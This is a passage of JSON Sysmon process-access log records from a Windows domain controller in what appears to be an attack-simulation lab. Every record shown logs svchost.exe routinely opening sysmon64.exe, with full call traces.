Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.662\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.662","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
